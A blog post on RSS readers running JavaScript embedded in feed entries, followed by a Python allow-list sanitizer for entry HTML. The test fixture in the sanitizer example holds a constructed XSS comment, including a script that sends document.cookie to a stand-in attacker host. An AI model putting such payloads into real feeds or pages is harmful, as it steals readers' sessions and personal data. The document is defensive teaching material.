More bad news from the Black Hat conference in Las Vegas, this time for the blogging community. Most RSS reader software is vulnerable to malicious JavaScript insertion: readers render the HTML carried in a feed entry, and if that HTML contains script, the reader runs it. Web-based readers are not immune either; in their case the script runs in the reader's own origin, with access to the session the user is logged in with. Since the typical JavaScript attack goes after passwords, cookies and personal data, this deserves to be taken seriously. Yet when I did a quick pop quiz amongst family and friends, not a single one (those in the IT security business apart) was aware that such software was a potential risk.
What makes this attack more dangerous is that it can be launched from a trusted site: a blog comment containing rogue code gets syndicated into that blog's comment feed and arrives in subscribers' readers carrying the trusted blog's name. It is not restricted to rogue bloggers by any means.
It is easy to lay the blame on RSS reader developers for not building in proper content filtering from day one, but the real problem runs deeper than that. The root of the problem is not RSS software at all; it is the lack of understanding of IT security at its most basic level, and the average user's apparent inability to realize the very real risk to their very real personal data that comes from not getting it.
If your reader lets you, disable the execution of scripts and applets embedded in feed content; a reader that strips or neutralizes active content before rendering an entry is the one real fix.
Combining this with general safe computing practice, including running a firewall and anti-malware scanners, represents the best defense available today.
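What "disabling scripts in feed content" looks like inside a reader, as an added example that is not code from the original post or from any particular RSS reader: an allow-list sanitizer that rebuilds each entry body from a small set of harmless tags, drops `<script>`/`<style>` blocks along with their contents, discards every attribute not on the allow-list (so `onerror`, `onload`, `style` and friends never survive), and refuses `javascript:` and similar link schemes. The allow-list and the malicious comment fed to it are constructed for this example; a production reader would choose its own tag set.

```python
"""Allow-list sanitizer for the HTML carried in RSS/Atom entry bodies.

Added example, not from the original post. The feed comment at the bottom is
constructed to exercise the three usual vectors: a script block, an event
handler attribute, and a javascript: link.
"""
import re
from html import escape
from html.parser import HTMLParser

# Tags a reader can render safely; everything else is removed (its text is kept).
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li",
                "blockquote", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href"}}  # every other attribute (on*, style, ...) is dropped
SAFE_SCHEME = re.compile(r"^(?:https?:|mailto:|/|#)", re.IGNORECASE)


def safe_url(value):
    """True only for links with a benign scheme (or a relative link)."""
    # Strip whitespace and control characters first so that "java\tscript:"
    # cannot sneak past the scheme check.
    cleaned = re.sub(r"[\x00-\x20]", "", value)
    return bool(SAFE_SCHEME.match(cleaned))


class FeedSanitizer(HTMLParser):
    """Rebuilds entry HTML keeping only allow-listed tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.raw_depth = 0  # >0 while inside <script>/<style>: content is discarded
        self.dropped = []   # audit trail of what was removed

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.raw_depth += 1
            self.dropped.append(tag)
            return
        if self.raw_depth:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)  # tag removed; its text content is kept
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"{tag}@{name}")
                continue
            if name == "href" and not safe_url(value or ""):
                self.dropped.append(f"{tag}@{name}")
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        # Self-closing form such as <br/> or <script/>: treat as start (+ end).
        self.handle_starttag(tag, attrs)
        if tag != "br":
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.raw_depth = max(0, self.raw_depth - 1)
            return
        if self.raw_depth or tag not in ALLOWED_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.raw_depth:
            # Text was decoded by the parser; re-escape it so no markup survives.
            self.out.append(escape(data, quote=False))


def sanitize_entry_html(html_fragment):
    """Return (clean_html, dropped_items) for one feed entry body."""
    parser = FeedSanitizer()
    parser.feed(html_fragment)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed comment, as it might be syndicated into a blog's comment feed.
MALICIOUS_COMMENT = (
    '<p>Nice post!</p>'
    '<script>new Image().src="http://attacker.example/?c="+document.cookie;</script>'
    '<img src="x" onerror="alert(document.cookie)">'
    '<a href="javascript:alert(1)">click</a> '
    '<a href="https://example.org/">safe link</a>'
)

if __name__ == "__main__":
    clean, dropped = sanitize_entry_html(MALICIOUS_COMMENT)
    print(clean)
    print("dropped:", dropped)
```

Run against the constructed comment, the script block, the `onerror` image and the `javascript:` link are all gone while the plain text and the https link survive; the `dropped` list gives the reader something to log so a suspicious feed can be spotted rather than silently cleaned. A deny-list that only hunts for `<script>` would have missed the other two vectors, which is why the allow-list approach is the one worth implementing.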